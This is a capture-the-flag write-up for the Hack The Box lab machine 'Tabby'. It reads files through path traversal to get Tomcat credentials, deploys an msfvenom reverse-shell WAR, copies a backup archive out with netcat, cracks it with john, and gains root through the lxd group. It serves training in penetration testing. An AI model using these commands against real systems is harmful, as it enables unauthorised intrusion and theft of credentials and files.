Posts Tabby Writeup [HTB]
Post
Cancel

Tabby Writeup [HTB]

Tabby is a Linux machine rated as easy from Hack The Box, it consists on using a local file inclusion vulnerability to obtain tomcat host manager credentials and then upload and deploy a war reverse shell. Then user pivoting can be done thanks to password reusage and lxd group privilege can be abused to obtain a root shell.

Enumeration

Running nmap :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
nmap -sC -sV 10.10.10.194
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-08 11:40 CEST
Nmap scan report for 10.10.10.194
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

In port 8080 we have Apache Tomcat running : Web We try to login as manager with default credentials with no luck , so let’s try port 80 to see if we can find them

Web

Clicking the news button we are redirected to megahosting.htb so we need to add it to our /etc/hosts :

Web

That file parameter might be vulnerable to lfi, trying with /etc/passwd to confirm our suspicions :

1
http://megahosting.htb/news.php?file=../../../../../../../../../etc/passwd

And we can read the file

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
tomcat:x:997:997::/opt/tomcat:/bin/false
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ash:x:1000:1000:clive:/home/ash:/bin/bash

As we have a local file inclusion vulnerability we can try to find the tomcat config file that contains the manager credentials , searching for that I found this package list: https://packages.debian.org/sid/all/tomcat9/filelist

By trying with some of this files I finally obtained the credentials reading tomcat-users.xml.

1
http://megahosting.htb/news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml
1
2
3
<role rolename="admin-gui"/>
 <role rolename="manager-script"/>
 <user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>

With this set of credentials we can login to tomcat host manager : Web

Exploitation

Looking for host manager exploits I came across this blog article.

Then I discovered there was also a metasploit module but we will perform the exploitation manually .

First we will create a war payload with msfvenom :

1
2
3
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.21 LPORT=443 -f war > shell.war
Payload size: 1088 bytes
Final size of war file: 1088 bytes

Then we can upload and deploy it using the api :

1
2
curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file shell.war "http://10.10.10.194:8080/manager/text/deploy?path=/shell.war"
OK - Deployed application at context path [/shell.war]

Finally we will trigger the reverse shell browsing to http://10.10.10.194:8080/shell.war

Checking netcat we obtain a connection as tomcat :

1
2
3
4
5
6
7
nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.194] 42130
whoami
tomcat
id
uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)

This shell can be upgraded into a full interactive tty :

1
2
3
4
5
python -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
export TERM=xterm

As user tomcat is a low privileged user , we need to find some credentials to pivot to ash which was previously discovered by reading /etc/passwd in the lfi.

Inside /var/www/html/files a zip file was discovered, as nc is installed in the machine we can use it to transfer it to our local machine : In the local machine :

1
nc -lvnp 4444 > file.zip

In the victim machine :

1
nc 10.10.14.21 4444 < 16162020_backup.zip

When we try to unzip that file we are asked for a password :

1
2
3
4
unzip file.zip
Archive:  file.zip
   creating: var/www/html/assets/
[file.zip] var/www/html/favicon.ico password:

Therefore we can use zip2john to crack that password :

1
2
3
4
zip2john file.zip > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --show hash.txt
file.zip:admin@it

With admin@it password we can unzip that file but it resulted to be a rabbithole.

As it was the only password we were able to find I tried to used it to log in as ash and it resulted on a succesful login :

1
2
3
4
tomcat@tabby:~$ su ash
Password:
ash@tabby:/opt/tomcat$ whoami
ash

Privilege Escalation

Checking the ouput of the id command, we see that user ash has lxd group privileges which can be abused to obtain root.

1
2
ash@tabby:~$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

First we will download and build an alpine image in the attacking machine :

1
2
3
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
./build-alpine -a i686

Now this image can be transferred by setting up a python server :

1
python -m SimpleHTTPServer 80

In the victim machine :

1
2
3
4
5
6
ash@tabby:~/lxd$ wget http://10.10.14.21/alpine-v3.12-x86_64-20200908_0634.tar.gz
--2020-09-08 10:55:18--  http://10.10.14.21/alpine-v3.12-x86_64-20200908_0634.tar.gz
Connecting to 10.10.14.21:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3218990 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.12-x86_64-20200908_0634.tar.gz’

Starting the lxd service :

1
ash@tabby:~/lxd$ lxd init

Then, we need to import the image, run it and mount the /root directory inside it:

1
2
3
ash@tabby:~/lxd$ lxc image import ./alpine-v3.12-x86_64-20200908_0634.tar.gz --alias myimage
ash@tabby:~/lxd$ lxc init myimage mycontainer -c security.privileged=true
ash@tabby:~/lxd$ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

Now we can start the container and execute a shell :

1
2
3
4
5
6
ash@tabby:~/lxd$ lxc start mycontainer
ash@tabby:~/lxd$ lxc exec mycontainer /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # whoami
root

Finally to access root files we need to go to the /mnt directory, where we can read the flag

1
2
~ # cat /mnt/root/root/root.txt
a6af4f720c922eb39b0e0829ad159203
This post is licensed under CC BY 4.0 by the author.